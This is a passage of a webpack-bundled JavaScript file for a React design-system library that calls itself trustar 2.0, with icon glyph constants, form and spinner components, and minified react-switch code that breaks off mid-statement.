var CHEVRON_RIGHT_SQUARE = { name: 'chevron-right-square', content: '\e999' };
var CHECK_SQUARE = { name: 'check-square', content: '\e99a' };
var CROSS_SQUARE = { name: 'cross-square', content: '\e99b' };
var MENU_SQUARE = { name: 'menu-square', content: '\e99c' };
var PROHIBITED = { name: 'prohibited', content: '\e99d' };
var CIRCLE = { name: 'circle', content: '\e99e' };
var RADIO_BUTTON = { name: 'radio-button', content: '\e99f' };
var LIGATURE = { name: 'ligature', content: '\e9a0' };
var TEXT_FORMAT = { name: 'text-format', content: '\e9a1' };
var TEXT_FORMAT_REMOVE = { name: 'text-format-remove', content: '\e9a2' };
var TEXT_SIZE = { name: 'text-size', content: '\e9a3' };
var BOLD = { name: 'bold', content: '\e9a4' };
var ITALIC = { name: 'italic', content: '\e9a5' };
var UNDERLINE = { name: 'underline', content: '\e9a6' };
var STRIKETHROUGH = { name: 'strikethrough', content: '\e9a7' };
var HIGHLIGHT = { name: 'highlight', content: '\e9a8' };
var TEXT_ALIGN_LEFT = { name: 'text-align-left', content: '\e9a9' };
var TEXT_ALIGN_CENTER = { name: 'text-align-center', content: '\e9aa' };
var TEXT_ALIGN_RIGHT = { name: 'text-align-right', content: '\e9ab' };
var TEXT_ALIGN_JUSTIFY = { name: 'text-align-justify', content: '\e9ac' };
var LINE_SPACING = { name: 'line-spacing', content: '\e9ad' };
var INDENT_INCREASE = { name: 'indent-increase', content: '\e9ae' };
var INDENT_DECREASE = { name: 'indent-decrease', content: '\e9af' };
var TEXT_WRAP = { name: 'text-wrap', content: '\e9b0' };
var PILCROW = { name: 'pilcrow', content: '\e9b1' };
var DIRECTION_LTR = { name: 'direction-ltr', content: '\e9b2' };
var DIRECTION_RTL = { name: 'direction-rtl', content: '\e9b3' };
var PAGE_BREAK = { name: 'page-break', content: '\e9b4' };
var PAGE_BREAK2 = { name: 'page-break2', content: '\e9b5' };
var SORT_ALPHA_ASC = { name: 'sort-alpha-asc', content: '\e9b6' };
var SORT_ALPHA_DESC = { name: 'sort-alpha-desc', content: '\e9b7' };
var SORT_NUMERIC_ASC = { name: 'sort-numeric-asc', content: '\e9b8' };
var SORT_NUMERIC_DESC = { name: 'sort-numeric-desc', content: '\e9b9' };
var SORT_AMOUNT_ASC = { name: 'sort-amount-asc', content: '\e9ba' };
var SORT_AMOUNT_DESC = { name: 'sort-amount-desc', content: '\e9bb' };
var SORT_TIME_ASC = { name: 'sort-time-asc', content: '\e9bc' };
var SORT_TIME_DESC = { name: 'sort-time-desc', content: '\e9bd' };
var SIGMA = { name: 'sigma', content: '\e9be' };
var PENCIL_LINE = { name: 'pencil-line', content: '\e9bf' };
var HAND = { name: 'hand', content: '\e9c0' };
var POINTER_UP = { name: 'pointer-up', content: '\e9c1' };
var POINTER_RIGHT = { name: 'pointer-right', content: '\e9c2' };
var POINTER_DOWN = { name: 'pointer-down', content: '\e9c3' };
var POINTER_LEFT = { name: 'pointer-left', content: '\e9c4' };
var FINGER_TAP = { name: 'finger-tap', content: '\e9c5' };
var FINGERS_TAP = { name: 'fingers-tap', content: '\e9c6' };
var REMINDER = { name: 'reminder', content: '\e9c7' };
var FINGERS_CROSSED = { name: 'fingers-crossed', content: '\e9c8' };
var FINGERS_VICTORY = { name: 'fingers-victory', content: '\e9c9' };
var GESTURE_ZOOM = { name: 'gesture-zoom', content: '\e9ca' };
var GESTURE_PINCH = { name: 'gesture-pinch', content: '\e9cb' };
var FINGERS_SCROLL_HORIZONTAL = { name: 'fingers-scroll-horizontal', content: '\e9cc' };
var FINGERS_SCROLL_VERTICAL = { name: 'fingers-scroll-vertical', content: '\e9cd' };
var FINGERS_SCROLL_LEFT = { name: 'fingers-scroll-left', content: '\e9ce' };
var FINGERS_SCROLL_RIGHT = { name: 'fingers-scroll-right', content: '\e9cf' };
var HAND2 = { name: 'hand2', content: '\e9d0' };
var POINTER_UP2 = { name: 'pointer-up2', content: '\e9d1' };
var POINTER_RIGHT2 = { name: 'pointer-right2', content: '\e9d2' };
var POINTER_DOWN2 = { name: 'pointer-down2', content: '\e9d3' };
var POINTER_LEFT2 = { name: 'pointer-left2', content: '\e9d4' };
var FINGER_TAP2 = { name: 'finger-tap2', content: '\e9d5' };
var FINGERS_TAP2 = { name: 'fingers-tap2', content: '\e9d6' };
var REMINDER2 = { name: 'reminder2', content: '\e9d7' };
var GESTURE_ZOOM2 = { name: 'gesture-zoom2', content: '\e9d8' };
var GESTURE_PINCH2 = { name: 'gesture-pinch2', content: '\e9d9' };
var FINGERS_SCROLL_HORIZONTAL2 = { name: 'fingers-scroll-horizontal2', content: '\e9da' };
var FINGERS_SCROLL_VERTICAL2 = { name: 'fingers-scroll-vertical2', content: '\e9db' };
var FINGERS_SCROLL_LEFT2 = { name: 'fingers-scroll-left2', content: '\e9dc' };
var FINGERS_SCROLL_RIGHT2 = { name: 'fingers-scroll-right2', content: '\e9dd' };
var FINGERS_SCROLL_VERTICAL3 = { name: 'fingers-scroll-vertical3', content: '\e9de' };
var BORDER_STYLE = { name: 'border-style', content: '\e9df' };
var BORDER_ALL = { name: 'border-all', content: '\e9e0' };
var BORDER_OUTER = { name: 'border-outer', content: '\e9e1' };
var BORDER_INNER = { name: 'border-inner', content: '\e9e2' };
var BORDER_TOP = { name: 'border-top', content: '\e9e3' };
var BORDER_HORIZONTAL = { name: 'border-horizontal', content: '\e9e4' };
var BORDER_BOTTOM = { name: 'border-bottom', content: '\e9e5' };
var BORDER_LEFT = { name: 'border-left', content: '\e9e6' };
var BORDER_VERTICAL = { name: 'border-vertical', content: '\e9e7' };
var BORDER_RIGHT = { name: 'border-right', content: '\e9e8' };
var BORDER_NONE = { name: 'border-none', content: '\e9e9' };
var ELLIPSIS = { name: 'ellipsis', content: '\ea10' };

/***/ }),
/* 3516 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Spinner; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_spinkit__ = __webpack_require__(1474);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_spinkit___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_react_spinkit__);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };





var initialValues = {
  name: 'line-scale',
  fadeIn: 'none',
  inline: false,
  hidden: false,
  bsSize: 'lg',
  message: ''
};

var StyledFlexContainer = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].div.withConfig({
  displayName: 'Spinner__StyledFlexContainer',
  componentId: 'sc-1pbnjms-0'
})(['display:flex;align-items:center;justify-content:center;height:100%;']);

var StyledSpinKit = Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */])(function (props) {
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_2_react_spinkit___default.a, {
    className: props.className,
    color: props.color,
    fadeIn: props.fadeIn,
    name: props.name
  });
}).withConfig({
  displayName: 'Spinner__StyledSpinKit',
  componentId: 'sc-1pbnjms-1'
})(['', ''], function (props) {
  return Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["b" /* css */])(['&&{height:', ';display:', ';visibility:', ';margin-left:', ';margin-right:', ';}&&.sk-three-bounce > div{height:', ';width:', ';}&.line-scale > div{height:', ' !important;width:', ';margin:', ';border-radius:', ';}&&.sk-cube-grid{width:', ';}'], props.size, props.inline ? 'inline-block' : 'block', props.hidden ? 'hidden' : 'visible', props.inline ? '.5rem' : 'unset', props.inline ? '.5rem' : 'unset', props.size, props.size, props.bsSize === 'sm' ? '.7rem' : '1.2rem', props.bsSize === 'sm' ? '.2rem' : '.333rem', props.bsSize === 'sm' ? '.1rem' : '.166rem', props.bsSize === 'sm' ? '.066rem' : '.088rem', props.size);
});

var StyledSpinKitWrapper = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].div.withConfig({
  displayName: 'Spinner__StyledSpinKitWrapper',
  componentId: 'sc-1pbnjms-2'
})(['position:relative;display:inline-flex;flex-direction:column;justify-content:center;align-items:center;']);

var StyledSpinnerMessage = __WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */].span.withConfig({
  displayName: 'Spinner__StyledSpinnerMessage',
  componentId: 'sc-1pbnjms-3'
})(['position:absolute;top:100%;white-space:nowrap;']);

var Spinner = function Spinner(props) {
  var size = props.bsSize === 'sm' ? '1rem' : '1.5rem';

  var spinnerElement = __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    StyledSpinKitWrapper,
    null,
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(StyledSpinKit, _extends({ size: size }, props)),
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      StyledSpinnerMessage,
      null,
      props.message
    )
  );

  if (props.inFlexContainer) {
    return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      StyledFlexContainer,
      { className: props.className || null },
      spinnerElement
    );
  } else {
    return spinnerElement;
  }
};

Spinner.defaultProps = initialValues;

/* unused harmony default export */ var _unused_webpack_default_export = (Spinner);

/***/ }),
/* 3517 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0__Input__ = __webpack_require__(3518);
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "b", function() { return __WEBPACK_IMPORTED_MODULE_0__Input__["a"]; });
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "c", function() { return __WEBPACK_IMPORTED_MODULE_0__Input__["b"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1__Form__ = __webpack_require__(3519);
/* unused harmony namespace reexport */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2__FormFeedback__ = __webpack_require__(3520);
/* unused harmony namespace reexport */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3__FormGroup__ = __webpack_require__(3521);
/* harmony reexport (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return __WEBPACK_IMPORTED_MODULE_3__FormGroup__["a"]; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4__FormText__ = __webpack_require__(3522);
/* unused harmony namespace reexport */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5__Label__ = __webpack_require__(3523);
/* harmony namespace reexport (by used) */ __webpack_require__.d(__webpack_exports__, "d", function() { return __WEBPACK_IMPORTED_MODULE_5__Label__["a"]; });







/***/ }),
/* 3518 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "b", function() { return Input; });
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return IconInput; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_reactstrap__ = __webpack_require__(59);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_components__ = __webpack_require__(42);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_trustar_2_0_themes_default__ = __webpack_require__(162);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_5_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_5_ramda__);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };











var inputDefaultProps = {
  width: '2rem',
  type: 'text',
  bsSize: 'lg',
  valid: false,
  invalid: false,
  inline: false,
  tag: 'input',
  plaintext: false,
  addon: false,
  className: '',
  name: '',
  disabled: false
};
var Input = function Input(props) {

  // $FlowFixMe: Ramda flow error.
  var inputProps = Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["pick"])(['width', 'type', 'bsSize', 'valid', 'invalid', 'tag', 'plaintext', 'addon', 'className', 'onChange', 'onClick', 'onKeyPress', 'name', 'value', 'checked', 'disabled', 'autoComplete', 'placeholder', 'aria-label', 'dataCy'], props);
  // I am skipping styled-components because
  // it's causing input lag issues when we try to
  // implement as a controlled component.
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_2_reactstrap__["Input"], _extends({ 'data-cy': props.dataCy || props.name, style: {
      display: props.inline ? 'inline' : 'block',
      verticalAlign: 'middle'
    } }, inputProps));
};

Input.defaultProps = inputDefaultProps;

// $FlowFixMe Weird flow error on InputPropType
var IconInput = function IconInput(props) {
  var IconAddon = Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_2_reactstrap__["InputGroupAddon"]).withConfig({
    displayName: 'Input__IconAddon',
    componentId: 'sc-23boaa-0'
  })(['&&{padding:.5rem;font-size:1.6rem;line-height:2.1rem;color:grey;background-color:', ';vertical-align:middle;border-left:none;border:1px solid #ced4da;box-sizing:border-box;border-top:1px;border-bottom:1px;}'], props.disabled ? '#e9ecef' : 'white');

  // $FlowFixMe: Ramda flow error.
  var inputProps = Object(__WEBPACK_IMPORTED_MODULE_5_ramda__["pick"])(['width', 'type', 'bsSize', 'valid', 'invalid', 'inline', 'tag', 'plaintext', 'addon', 'className', 'icon', 'onChange', 'onKeyPress', 'value', 'name', 'disabled', 'autoComplete', 'placeholder', 'aria-label'], props);

  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    __WEBPACK_IMPORTED_MODULE_2_reactstrap__["InputGroup"],
    null,
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(Input, _extends({}, inputProps, { 'data-cy': props.dataCy || props.name })),
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      IconAddon,
      { addonType: 'append' },
      __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_3_trustar_2_0_components__["o" /* Icon */], { fontSize: props.bsSize === 'lg' ? '2rem' : '1.5rem', icon: props.icon })
    )
  );
};

IconInput.defaultProps = inputDefaultProps;

/* unused harmony default export */ var _unused_webpack_default_export = (Input);

/***/ }),
/* 3519 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export Form */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_reactstrap__ = __webpack_require__(59);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_themes_default__ = __webpack_require__(162);








var Form = function Form(props) {
  var Form = Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_2_reactstrap__["Form"]).withConfig({
    displayName: 'Form',
    componentId: 'iwk8z6-0'
  })(['']);
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(Form, props);
};

Form.defaultProps = {
  inline: false,
  tag: 'form'
};

/* unused harmony default export */ var _unused_webpack_default_export = (Form);

/***/ }),
/* 3520 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export FormFeedback */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_reactstrap__ = __webpack_require__(59);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_themes_default__ = __webpack_require__(162);








var FormFeedback = function FormFeedback(props) {
  var FormFeedback = Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_2_reactstrap__["FormFeedback"]).withConfig({
    displayName: 'FormFeedback',
    componentId: 'aek0sk-0'
  })(['']);
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(FormFeedback, props);
};

FormFeedback.defaultProps = {
  valid: false,
  tooltip: false
};

/* unused harmony default export */ var _unused_webpack_default_export = (FormFeedback);

/***/ }),
/* 3521 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return FormGroup; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_reactstrap__ = __webpack_require__(59);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_themes_default__ = __webpack_require__(162);








var FormGroup = function FormGroup(props) {
  var StyledFormGroup = Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_2_reactstrap__["FormGroup"]).withConfig({
    displayName: 'FormGroup__StyledFormGroup',
    componentId: 'sc-14zggtl-0'
  })(['']);
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(StyledFormGroup, props);
};

FormGroup.defaultProps = {
  row: false,
  inline: false,
  disabled: false,
  check: false,
  tag: 'div'
};

/* unused harmony default export */ var _unused_webpack_default_export = (FormGroup);

/***/ }),
/* 3522 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export FormText */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_reactstrap__ = __webpack_require__(59);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_themes_default__ = __webpack_require__(162);








var FormText = function FormText(props) {
  var FormText = Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_2_reactstrap__["FormText"]).withConfig({
    displayName: 'FormText',
    componentId: 'rskjmb-0'
  })(['font-size:1.167rem;line-height:1.583rem;']);
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(FormText, props);
};

FormText.defaultProps = {
  inline: false
};

/* unused harmony default export */ var _unused_webpack_default_export = (FormText);

/***/ }),
/* 3523 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return Label; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_reactstrap__ = __webpack_require__(59);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_themes_default__ = __webpack_require__(162);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda__ = __webpack_require__(8);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_4_ramda___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_4_ramda__);









var Label = function Label(props) {
  var Label = Object(__WEBPACK_IMPORTED_MODULE_1_styled_components__["c" /* default */])(__WEBPACK_IMPORTED_MODULE_2_reactstrap__["Label"]).withConfig({
    displayName: 'Label',
    componentId: 'sc-1htyosl-0'
  })(['&&{display:', ';font-weight:', ';line-height:', ';font-size:', ';margin-bottom:', ';}'], props.inline ? 'inline-block' : 'block', props.inline ? 'normal' : 600, props.inline ? '1rem' : '1.83rem', props.inline ? '1rem' : '1.33rem', props.inline ? '0' : '.5rem');

  // $FlowFixMe: Ramda flow error.
  var labelProps = Object(__WEBPACK_IMPORTED_MODULE_4_ramda__["pick"])(['children', 'for', 'className'], props);
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(Label, labelProps);
};

Label.defaultProps = {
  for: '',
  inline: false
};

/* unused harmony default export */ var _unused_webpack_default_export = (Label);

/***/ }),
/* 3524 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* unused harmony export DesignSystemProvider */
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_styled_components__ = __webpack_require__(11);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_trustar_2_0_themes__ = __webpack_require__(77);




var initialValues = {
  theme: 'default'
};

var DesignSystemProvider = function DesignSystemProvider(props) {
  var className = props.theme === 'default' ? 'trustar' : 'trustar-dark';
  var themeConfiguration = props.theme === 'default' ? __WEBPACK_IMPORTED_MODULE_2_trustar_2_0_themes__["b" /* DefaultTheme */] : __WEBPACK_IMPORTED_MODULE_2_trustar_2_0_themes__["a" /* DarkTheme */];
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
    'div',
    { className: className },
    __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(
      __WEBPACK_IMPORTED_MODULE_1_styled_components__["a" /* ThemeProvider */],
      { theme: themeConfiguration },
      props.children
    )
  );
};

DesignSystemProvider.defaultProps = initialValues;

/* unused harmony default export */ var _unused_webpack_default_export = (DesignSystemProvider);

/***/ }),
/* 3525 */
/***/ (function(module, __webpack_exports__, __webpack_require__) {

"use strict";
/* harmony export (binding) */ __webpack_require__.d(__webpack_exports__, "a", function() { return ToggleSwitch; });
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react__ = __webpack_require__(0);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_0_react___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_0_react__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_1_react_redux__ = __webpack_require__(24);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_switch__ = __webpack_require__(3526);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_2_react_switch___default = __webpack_require__.n(__WEBPACK_IMPORTED_MODULE_2_react_switch__);
/* harmony import */ var __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_themes__ = __webpack_require__(77);
var _extends = Object.assign || function (target) { for (var i = 1; i < arguments.length; i++) { var source = arguments[i]; for (var key in source) { if (Object.prototype.hasOwnProperty.call(source, key)) { target[key] = source[key]; } } } return target; };







var initialValues = {
  checked: false,
  theme: __WEBPACK_IMPORTED_MODULE_3_trustar_2_0_themes__["b" /* DefaultTheme */],
  onChange: function onChange() {}
};

var ToggleSwitch = function ToggleSwitch(props) {
  return __WEBPACK_IMPORTED_MODULE_0_react___default.a.createElement(__WEBPACK_IMPORTED_MODULE_2_react_switch___default.a, _extends({}, props, {
    uncheckedIcon: false,
    checkedIcon: false,
    width: 64,
    handleDiameter: 22
    // TODO: BOX_SHADOW should be SHADES_OF_BLACK_200
    // $FlowIgnore theme IS provided
    , boxShadow: '0 0 2px 1px ' + props.theme.ThemeColors.BOX_SHADOW.hex,
    height: 16 }));
};

ToggleSwitch.defaultProps = initialValues;

/***/ }),
/* 3526 */
/***/ (function(module, exports, __webpack_require__) {

if (true) {
  module.exports = __webpack_require__(3527);
} else {
  module.exports = require("./dist/react-switch.dev.js");
}


/***/ }),
/* 3527 */
/***/ (function(module, exports, __webpack_require__) {

var React=__webpack_require__(0),uncheckedIcon=React.createElement("svg",{viewBox:"-2 -5 14 20",height:"100%",width:"100%",style:{position:"absolute",top:0}},React.createElement("path",{d:"M9.9 2.12L7.78 0 4.95 2.828 2.12 0 0 2.12l2.83 2.83L0 7.776 2.123 9.9 4.95 7.07 7.78 9.9 9.9 7.776 7.072 4.95 9.9 2.12",fill:"#fff",fillRule:"evenodd"})),checkedIcon=React.createElement("svg",{height:"100%",width:"100%",viewBox:"-2 -5 17 21",style:{position:"absolute",top:0}},React.createElement("path",{d:"M11.264 0L5.26 6.004 2.103 2.847 0 4.95l5.26 5.26 8.108-8.107L11.264 0",fill:"#fff",fillRule:"evenodd"}));function createBackgroundColor(t,i,o,s,n){var h=(t-o)/(i-o);if(0===h)return s;if(1===h)return n;for(var e="#",a=1;a<6;a+=2){var r=parseInt(s.substr(a,2),16),l=parseInt(n.substr(a,2),16),c=Math.round((1-h)*r+h*l).toString(16);1===c.length&&(c="0"+c),e+=c}return e}function convertShorthandColor(t){if(7===t.length)return t;for(var i="#",o=1;o<4;o+=1)i+=t[o]+t[o];return i}function getBackgroundColor(t,i,o,s,n){return createBackgroundColor(t,i,o,convertShorthandColor(s),convertShorthandColor(n))}var ReactSwitch=function(n){function t(t){n.call(this,t);var i=t.height,o=t.width,s=t.checked;this.t=t.handleDiameter||i-2,this.i=Math.max(o-i,o-(i+this.t)/2),this.o=Math.max(0,(i-this.t)/2),this.state={s:s?this.i:this.o},this.n=this.n.bind(this),this.h=this.h.bind(this),this.e=this.e.bind(this),this.a=this.a.bind(this),this.r=this.r.bind(this),this.l=this.l.bind(this),this.c=this.c.bind(this),this.u=this.u.bind(this),this.f=this.f.bind(this)}return n&&(t.__proto__=n),((t.prototype=Object.create(n&&n.prototype)).constructor=t).prototype.componentWillReceiveProps=function(t){this.setState({s:t.checked?this.i:this.o})},t.prototype.g=function(t){this.setState({p:t,b:!0})},t.prototype.v=function(t){var i=Math.min(this.i,Math.max(this.o,(this.props.checked?this.i:this.o)+t-this.state.p));this.setState({s:i,k:!0})},t.prototype.w=function(t){var i=this.state,o=i.s,s=this.props,n=s.checked,h=s.onChange,e=s.id;return i.k?n?(this.i+this.o)/2<o?void this.setState({s:this.i,k:!1,b:!1}):(this.setState({k:!1,b:!1}),void h(!1,t,e)):void(o<(this.i+this.o)/2?this.setState({s:this.o,k:!1,b:!1}):(this.setState({k:!1,b:!1}),h(!0,t,e))):(this.setState({b:!1}),void h(!n,t,e))},t.prototype.n=function(t){"number"==typeof t.button&&0!==t.button||(this.g(t.clientX),window.addEventListener("mousemove",this.h),window.addEventListener("mouseup",this.e))},t.prototype.h=function(t){t.preventDefault(),this.v(t.clientX)},t.prototype.e=function(t){this.w(t),window.removeEventListener("mousemove",this.h),window.removeEventListener("mouseup",this.e)},t.prototype.a=function(t){this.g(t.touches[0].clientX)},t.prototype.r=function(t){this.v(t.touches[0].clientX)},t.prototype.l=function(t){t.preventDefault(),this.w(t)},t.prototype.c=function(){this.setState({b:!1})},t.prototype.u=function(t){var i=this.props;(0,i.onChange)(!i.checked,t,i.id)},t.prototype.f=function(t){var i=this.props,o=i.checked,s=i.onChange,n=i.id;32!==t.keyCode&&13!==t.keyCode||this.state.k||(t.preventDefault(),s(!o,t,n))},t.prototype.render=function(){var t=this,i=this.props,o=i.checked,s=i.disabled,n=i.className,h=i.offColor,e=i.onColor,a=i.offHandleColor,r=i.onHandleColor,l=i.checkedIcon,c=i.uncheckedIcon,u=i.boxShadow,d=i.activeBoxShadow,f=i.height,g=i.width,p=i.id,b=i["aria-labelledby"],v=i["aria-label"],k=this.state,w=k.s,y=k.k,$=k.b,M={position:"relative",display:"inline-block",textAlign:"left",opacity:s?.5:1,borderRadius:f/2,WebkitTransition:"opacity 0.25s",MozTransition:"opacity 0.25s",transition:"opacity 0.25s",touchAction:"none",WebkitTapHighlightColor:"rgba(0, 0, 0, 0)",WebkitUserSelect:"none",MozUserSelect:"none",msUserSelect:"none",userSelect:"none"},R={height:f,width:g,margin:Math.max(0,(this.t-f)/2),position:"relative",background:getBackgroundColor(w,this.i,this.o,h,e),borderRadius:f/2,cursor:s?"default":"pointer",WebkitTransition:y?null:"background 0.25s",MozTransition:y?null:"background 0.25s",transition:y?null:"background 0.25s"},m={height:f,width:Math.min(1.5*f,g-(this.t+f)/2+1),position:"relative",opacity:(w-this.o)/(this.i-this.o),pointerEvents:"none",WebkitTransition:y?null:"opacity 0.25s",MozTransition:y?null:"opacity 0.25s",transition:y?null:"opacity 0.25s"},C={height:f,width:Math.min(1.5*f,g-(this.t+f)/2+1),position:"absolute",opacity:1-(w-this.o)/(this.i-this.o),right:0,top:0,pointerEvents:"none",WebkitTransition:y?null:"opacity 0.25s",MozTransition:y?null:"opacity 